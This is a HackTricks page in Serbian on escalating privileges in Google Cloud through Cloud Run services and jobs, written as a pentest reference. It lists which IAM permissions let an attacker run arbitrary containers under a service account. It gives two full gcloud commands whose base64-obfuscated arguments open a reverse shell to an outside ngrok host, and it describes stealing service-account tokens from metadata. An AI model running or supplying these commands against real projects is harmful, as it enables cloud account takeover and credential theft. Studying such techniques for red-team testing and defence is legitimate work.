GCP - Run Privesc

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Ako želite da vidite svoju kompaniju reklamiranu na HackTricks-u ili da preuzmete HackTricks u PDF formatu proverite PLANOVE ZA PRIJAVU!
Nabavite zvanični PEASS & HackTricks swag
Otkrijte The PEASS Family, našu kolekciju ekskluzivnih NFT-ova
Pridružite se 💬 Discord grupi ili telegram grupi ili me pratite na Twitteru 🐦 @carlospolopm.
Podelite svoje hakovanje trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.

Cloud Run

Za više informacija o Cloud Run-u proverite:

`run.services.create` , `iam.serviceAccounts.actAs`, `run.routes.invoke`

Napadač sa ovim dozvolama može kreirati run servis koji pokreće proizvoljan kod (proizvoljan Docker kontejner), pridružiti mu Service Account, i naterati kod da izfiltrira Service Account token iz metapodataka.

Skripta za eksploataciju ovog metoda može se pronaći ovde a Docker slika ovde.

Imajte na umu da prilikom korišćenja gcloud run deploy umesto samo kreiranja servisa potrebna je dozvola update. Pogledajte primer ovde.

`run.services.update` , `iam.serviceAccounts.actAs`

Slično prethodnom ali ažuriranje servisa:

gcloud run deploy hacked \
--image=marketplace.gcr.io/google/ubuntu2004 \
--command=bash \
--args="-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNy50Y3AuZXUubmdyb2suaW8vMTQ4NDEgMD4mMQ== | base64 -d | bash" \
--service-account="<proj-num>-compute@developer.gserviceaccount.com" \
--region=us-central1 \
--allow-unauthenticated

`run.services.setIamPolicy`

Dodelite sebi prethodne dozvole nad cloud Run uslugama.

`run.jobs.create`, `run.jobs.run`, (`run.jobs.get`)

Pokrenite posao sa reverznim shell-om kako biste ukrali nalog usluge naveden u komandi. Možete pronaći eksploataciju ovde.

`run.jobs.update`,`run.jobs.run`,`iam.serviceaccounts.actAs`,(`run.jobs.get`)

Slično prethodnom, moguće je ažurirati posao i ažurirati SA, komandovati i izvršiti ga:

gcloud beta run jobs update hacked \
--image=marketplace.gcr.io/google/ubuntu2004 \
--command=bash \
--args="-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNy50Y3AuZXUubmdyb2suaW8vMTQ4NDEgMD4mMQ== | base64 -d | bash" \
--service-account=<proj-num>-compute@developer.gserviceaccount.com \
--region=us-central1 \
--project=security-devbox --execute-now

`run.jobs.setIamPolicy`

Dodelite sebi prethodna ovlašćenja nad Cloud Jobs.

Reference

https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Ako želite da vidite vašu kompaniju reklamiranu na HackTricks-u ili preuzmete HackTricks u PDF formatu proverite PLANOVE ZA PRETPLATU!
Nabavite zvanični PEASS & HackTricks swag
Otkrijte The PEASS Family, našu kolekciju ekskluzivnih NFT-ova
Pridružite se 💬 Discord grupi ili telegram grupi ili me pratite na Twitter-u 🐦 @carlospolopm.
Podelite svoje hakovanje trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.

PreviousGCP - Resourcemanager Privesc NextGCP - Secretmanager Privesc

Last updated 28 days ago

Cloud Run

run.services.create , iam.serviceAccounts.actAs, run.routes.invoke

run.services.update , iam.serviceAccounts.actAs

run.services.setIamPolicy

run.jobs.create, run.jobs.run, (run.jobs.get)

run.jobs.update,run.jobs.run,iam.serviceaccounts.actAs,(run.jobs.get)

run.jobs.setIamPolicy